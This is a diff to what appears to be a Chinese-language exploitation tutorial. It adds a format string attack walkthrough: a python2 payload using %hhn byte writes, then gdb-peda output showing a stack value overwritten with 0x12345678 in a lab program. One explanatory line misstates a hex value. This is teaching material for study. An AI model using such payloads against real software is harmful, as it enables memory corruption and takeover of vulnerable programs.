diff --git a/doc/3.3.1_format_string.md b/doc/3.3.1_format_string.md
index f195e70..10c0d9c 100644
--- a/doc/3.3.1_format_string.md
+++ b/doc/3.3.1_format_string.md
@@ -1040,7 +1040,96 @@ gdb-peda$ x/4wb 0xffffd538
 ```
 把 `AAAA`、`BBBB`、`CCCC`、`DDDD` 占据的地址分别替换成括号中的值,再适当使用填充字节使 8 字节对齐就可以了。构造输入如下:
 ```
+$ python2 -c 'print("\x38\xd5\xff\xff"+"\x39\xd5\xff\xff"+"\x3a\xd5\xff\xff"+"\x3b\xd5\xff\xff"+"%104c%13$hhn"+"%222c%14$hhn"+"%222c%15$hhn"+"%222c%16$hhn")' > text
+```
+其中前四个部分是 4 个写入地址,占 4*4=16 字节,后面四个部分分别用于写入十六进制数,由于使用了 `hh`,所以只会保留一个字节 `0x78`(16+104=120 -> 0x56)、`0x56`(120+222=342 -> 0x0156 -> 56)、`0x34`(342+222=564 -> 0x0234 -> 0x34)、`0x12`(564+222=786 -> 0x312 -> 0x12)。执行结果如下:
+```
+$ gdb -q a.out
+Reading symbols from a.out...(no debugging symbols found)...done.
+gdb-peda$ b printf
+Breakpoint 1 at 0x8048350
+gdb-peda$ r < text
+Starting program: /home/firmy/Desktop/RE4B/a.out < text
+[----------------------------------registers-----------------------------------]
+EAX: 0xffffd564 --> 0xffffd538 --> 0x88888888
+EBX: 0x804a000 --> 0x8049f14 --> 0x1
+ECX: 0x1
+EDX: 0xf7f9883c --> 0x0
+ESI: 0xf7f96e68 --> 0x1bad90
+EDI: 0x0
+EBP: 0xffffd5f8 --> 0x0
+ESP: 0xffffd52c --> 0x8048520 (: add esp,0x20)
+EIP: 0xf7e27c20 (: call 0xf7f06d17 <__x86.get_pc_thunk.ax>)
+EFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+ 0xf7e27c1b : ret
+ 0xf7e27c1c: xchg ax,ax
+ 0xf7e27c1e: xchg ax,ax
+=> 0xf7e27c20 : call 0xf7f06d17 <__x86.get_pc_thunk.ax>
+ 0xf7e27c25 : add eax,0x16f243
+ 0xf7e27c2a : sub esp,0xc
+ 0xf7e27c2d : mov eax,DWORD PTR [eax+0x124]
+ 0xf7e27c33 : lea edx,[esp+0x14]
+No argument
+[------------------------------------stack-------------------------------------]
+0000| 0xffffd52c --> 0x8048520 (: add esp,0x20)
+0004| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
+0008| 0xffffd534 --> 0x1
+0012| 0xffffd538 --> 0x88888888
+0016| 0xffffd53c --> 0xffffffff
+0020| 0xffffd540 --> 0xffffd55a ("ABCD")
+0024| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x88888888
+0028| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+Breakpoint 1, 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
+gdb-peda$ x/20x $esp
+0xffffd52c: 0x08048520 0xffffd564 0x00000001 0x88888888
+0xffffd53c: 0xffffffff 0xffffd55a 0xffffd564 0x080481fc
+0xffffd54c: 0x080484b0 0xf7ffda54 0x00000001 0x424135d0
+0xffffd55c: 0x00004443 0x00000000 0xffffd538 0xffffd539
+0xffffd56c: 0xffffd53a 0xffffd53b 0x34303125 0x33312563
+gdb-peda$ finish
+Run till exit from #0 0xf7e27c20 in printf () from /usr/lib32/libc.so.6
+[----------------------------------registers-----------------------------------]
+EAX: 0x312
+EBX: 0x804a000 --> 0x8049f14 --> 0x1
+ECX: 0x0
+EDX: 0xf7f98830 --> 0x0
+ESI: 0xf7f96e68 --> 0x1bad90
+EDI: 0x0
+EBP: 0xffffd5f8 --> 0x0
+ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
+EIP: 0x8048520 (: add esp,0x20)
+EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
+[-------------------------------------code-------------------------------------]
+ 0x8048514 : lea eax,[ebp-0x94]
+ 0x804851a : push eax
+ 0x804851b : call 0x8048350
+=> 0x8048520 : add esp,0x20
+ 0x8048523 : sub esp,0xc
+ 0x8048526 : push 0xa
+ 0x8048528 : call 0x8048370
+ 0x804852d : add esp,0x10
+[------------------------------------stack-------------------------------------]
+0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
+0004| 0xffffd534 --> 0x1
+0008| 0xffffd538 --> 0x12345678
+0012| 0xffffd53c --> 0xffffffff
+0016| 0xffffd540 --> 0xffffd55a ("ABCD")
+0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
+0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
+0028| 0xffffd54c --> 0x80484b0 (: add ebx,0x1b50)
+[------------------------------------------------------------------------------]
+Legend: code, data, rodata, value
+0x08048520 in main ()
+gdb-peda$ x/20x $esp
+0xffffd530: 0xffffd564 0x00000001 0x12345678 0xffffffff
+0xffffd540: 0xffffd55a 0xffffd564 0x080481fc 0x080484b0
+0xffffd550: 0xf7ffda54 0x00000001 0x424135d0 0x00004443
+0xffffd560: 0x00000000 0xffffd538 0xffffd539 0xffffd53a
+0xffffd570: 0xffffd53b 0x34303125 0x33312563 0x6e686824
 ```